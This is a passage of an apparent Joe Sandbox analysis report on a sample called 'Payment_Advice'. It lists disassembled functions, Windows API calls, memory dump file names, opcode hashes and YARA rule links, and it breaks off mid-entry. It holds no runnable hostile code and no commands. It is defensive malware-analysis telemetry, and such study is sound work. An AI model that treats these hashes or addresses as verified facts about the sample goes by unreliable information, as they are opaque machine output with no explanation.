                                                                                                    • Opcode ID: acc3aac040c1a6fbe2890a581a3a8fe9eb327f20ca77d5a164b2f5e871889088
                                                                                                    • Instruction ID: 90925add3d46dd4a149b4ff7912100798461c6d8d4c1a8cb534652ebbd9ee13f
                                                                                                    • Opcode Fuzzy Hash: acc3aac040c1a6fbe2890a581a3a8fe9eb327f20ca77d5a164b2f5e871889088
                                                                                                    • Instruction Fuzzy Hash: D6D0223C198332384E242E70380F5493F85BED3BB1FE086DAF820E68C1EF148080A111
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3351165006-0
                                                                                                    • Opcode ID: bf19c2da8647c53301f4ed80805944387a9c4d76d6d392f1f9053dbb4ba49869
                                                                                                    • Instruction ID: f5520ec2e3548abf02f06c25c8ea2f410a7f50cd21eb42002b7192522f374c6a
                                                                                                    • Opcode Fuzzy Hash: bf19c2da8647c53301f4ed80805944387a9c4d76d6d392f1f9053dbb4ba49869
                                                                                                    • Instruction Fuzzy Hash: 54C0123245C200BECB010BB8DC09C2BBBA8ABA7312F04C928F0A5C2060C238C154EB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005012D3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 005012E1
                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 005012E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherItemUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 4250310104-0
                                                                                                    • Opcode ID: 855ccf841796fe0d8efe734e53fa805f5cc604704b77c2e3afec7c43359783a9
                                                                                                    • Instruction ID: 649cb66a3f996935ac6f000dc554b04bcb7787f96cda6e9b6ad0fe34644fa621
                                                                                                    • Opcode Fuzzy Hash: 855ccf841796fe0d8efe734e53fa805f5cc604704b77c2e3afec7c43359783a9
                                                                                                    • Instruction Fuzzy Hash: 1EC04C7640C240BFCB015BA4DC0CC2FBFA9ABA6321F04C819F1A581120C775C514EB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00501A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 10e3bf728071f5671845e1c19fc983567ef23fffc023f3a95f6a3b261a813ce1
                                                                                                    • Instruction ID: 5580f5684ae0b34dbc4a7c5da148d856dd9ba7182ea3a1cb9c0defeebfe8df2f
                                                                                                    • Opcode Fuzzy Hash: 10e3bf728071f5671845e1c19fc983567ef23fffc023f3a95f6a3b261a813ce1
                                                                                                    • Instruction Fuzzy Hash: 1BC1AE30A00A559BEF25DF68C888BAD7FA5BF55310F0805B9EC46DB3D2DB309944CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00503BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 58b7a660ed226e0a42923d389e0d4bd11907e261b82f3c9e78387cb379b083a5
                                                                                                    • Instruction ID: 9ec63da5cd07c1fa55e19e8d318e78bd4e25ba3b6f2f91f1301430c481ab6311
                                                                                                    • Opcode Fuzzy Hash: 58b7a660ed226e0a42923d389e0d4bd11907e261b82f3c9e78387cb379b083a5
                                                                                                    • Instruction Fuzzy Hash: 5C71A171540B459EDB35DB70C8599EBBBEDBF54300F40092EE6AB87281EA326A84CF11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00508284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00508289
                                                                                                      • Part of subcall function 005013DC: __EH_prolog.LIBCMT ref: 005013E1
                                                                                                      • Part of subcall function 0050A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506663941-0
                                                                                                    • Opcode ID: 53d0b7438c05a336879d59d9f3fe8067e12119655016a0fa4ec89f93d0e766cd
                                                                                                    • Instruction ID: 324f2bff8ba8a32b8b3ce7c53c2c19536e8e14c40a80f51f26d61667ae39ecd0
                                                                                                    • Opcode Fuzzy Hash: 53d0b7438c05a336879d59d9f3fe8067e12119655016a0fa4ec89f93d0e766cd
                                                                                                    • Instruction Fuzzy Hash: 0E4184719446599ADF20DB60CC59EFEBBA8BF80304F4404EAE58A970C3EB756EC5CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 005013E1
                                                                                                      • Part of subcall function 00505E37: __EH_prolog.LIBCMT ref: 00505E3C
                                                                                                      • Part of subcall function 0050CE40: __EH_prolog.LIBCMT ref: 0050CE45
                                                                                                      • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: f9d2ba6c2314425f36e922fbf127b7ce017df65ce0b3b8c3859ffb689e26970f
                                                                                                    • Instruction ID: b99f464a95b8d330d1c2430d63390680a4961dc98693cd0c35896121dddc93fc
                                                                                                    • Opcode Fuzzy Hash: f9d2ba6c2314425f36e922fbf127b7ce017df65ce0b3b8c3859ffb689e26970f
                                                                                                    • Instruction Fuzzy Hash: 794149B0905B419EE724DF398889AEAFFE5BF19300F50492ED5FE83282CB716654CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 005013E1
                                                                                                      • Part of subcall function 00505E37: __EH_prolog.LIBCMT ref: 00505E3C
                                                                                                      • Part of subcall function 0050CE40: __EH_prolog.LIBCMT ref: 0050CE45
                                                                                                      • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: c9629419fdc14a0bef445e474c437bd97c28937a9ce04683047df9a0ad313fda
                                                                                                    • Instruction ID: c8439dddda81735c450bbd96faa1f3a57accfa570d57f1ac2895fd958be1ad0c
                                                                                                    • Opcode Fuzzy Hash: c9629419fdc14a0bef445e474c437bd97c28937a9ce04683047df9a0ad313fda
                                                                                                    • Instruction Fuzzy Hash: 864147B0905B419EE724DF798889AEAFFE5BF19300F50492ED5FE83282CB716654CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 16b2a880b20ffa7f2fc4dfc379c8d2702a5061a85793bffd8beba18ad624f665
                                                                                                    • Instruction ID: 11362531108186e71e5ffa0e9b3937206c00270273f2bd004d40e0c5e180b381
                                                                                                    • Opcode Fuzzy Hash: 16b2a880b20ffa7f2fc4dfc379c8d2702a5061a85793bffd8beba18ad624f665
                                                                                                    • Instruction Fuzzy Hash: 6221E6B5E40212AFEB149F74CC466AA7FACFF45314F00053AA506AA681D3B49E80C7E8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051B098
                                                                                                      • Part of subcall function 005013DC: __EH_prolog.LIBCMT ref: 005013E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 50bcc2ee9e95b111dc44480fb4e745aec774d0b69ceb1c87c6319eb6a73ea87f
                                                                                                    • Instruction ID: 3ec71288ab9ec2da71530e219d555f09869ac8042499fcfdefb76404aa9accca
                                                                                                    • Opcode Fuzzy Hash: 50bcc2ee9e95b111dc44480fb4e745aec774d0b69ceb1c87c6319eb6a73ea87f
                                                                                                    • Instruction Fuzzy Hash: 49318B71C0024AAAEF14DF64D8559EEBBB4BF49300F10449EE809B7282D735AE44CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0052ACF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: 910afb733312be2215f95a397105b0d9abc515eb4e3ce90437f5dc20a4e0e198
                                                                                                    • Instruction ID: 46d7766a57972f2a587ffd0973c831e15402942bc89b89d47249ee6e6333c7fd
                                                                                                    • Opcode Fuzzy Hash: 910afb733312be2215f95a397105b0d9abc515eb4e3ce90437f5dc20a4e0e198
                                                                                                    • Instruction Fuzzy Hash: 5711C133A006359B9B269E2CFC4185A7B96FF863607164621FC15AB3D4E630EC019BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DA52 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051DA57
                                                                                                      • Part of subcall function 00510659: _wcslen.LIBCMT ref: 0051066F
                                                                                                      • Part of subcall function 00507B0D: __EH_prolog.LIBCMT ref: 00507B12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838827086-0
                                                                                                    • Opcode ID: c043c58c9e836cf1f2bfa84742aafdd463bfd1986a7ddd922ce8650893af62e5
                                                                                                    • Instruction ID: 70bdd2d1c43a123553a452cde46d89ff9339e9b4399e069898fbf45264d9178c
                                                                                                    • Opcode Fuzzy Hash: c043c58c9e836cf1f2bfa84742aafdd463bfd1986a7ddd922ce8650893af62e5
                                                                                                    • Instruction Fuzzy Hash: DD112B35904394AED710EBA4A82B7DC7FE0FB65315F00408EE504532C2DB751A88DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: b3c87c0e73e15b0796d2af52a0c1d638cf2261e4d6848789eaaf1421a55a8888
                                                                                                    • Instruction ID: be384b24cb8e8628da011dc73436383a7ae66062e10490edd94be605ccfb39d6
                                                                                                    • Opcode Fuzzy Hash: b3c87c0e73e15b0796d2af52a0c1d638cf2261e4d6848789eaaf1421a55a8888
                                                                                                    • Instruction Fuzzy Hash: 6501A537D0092AABCF11ABA8CD869DEBF32BFC8740F014515E812B7192DA348D00C6A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0052B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052B177
                                                                                                    • _free.LIBCMT ref: 0052C4E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction ID: 0d792275870ad87ac29f98451578db158f54554caaf8c294c9faea7e44033370
                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction Fuzzy Hash: 50012B722003155BE7319E55A88596AFFE8FFC6330F25091DE184832C1EA30A905C764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052B177
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 404e29ce76ccaa6b522bceb117ac1206d1dbabb3495588986c8574cb238ff9d4
                                                                                                    • Instruction ID: f9b3cfb1dbcdc2f4ce1e60dd716395db74fe9f97455eaf199dc3520e80333434
                                                                                                    • Opcode Fuzzy Hash: 404e29ce76ccaa6b522bceb117ac1206d1dbabb3495588986c8574cb238ff9d4
                                                                                                    • Instruction Fuzzy Hash: 6AF0903290553566FB215A62BC19B5A3F48BF83760F188111B808AA1D0CB60D921C2E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00523C3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: f2100371eff988595885d5c3555241888cc2be14dbabbd408c9dff6c7ba1f5f8
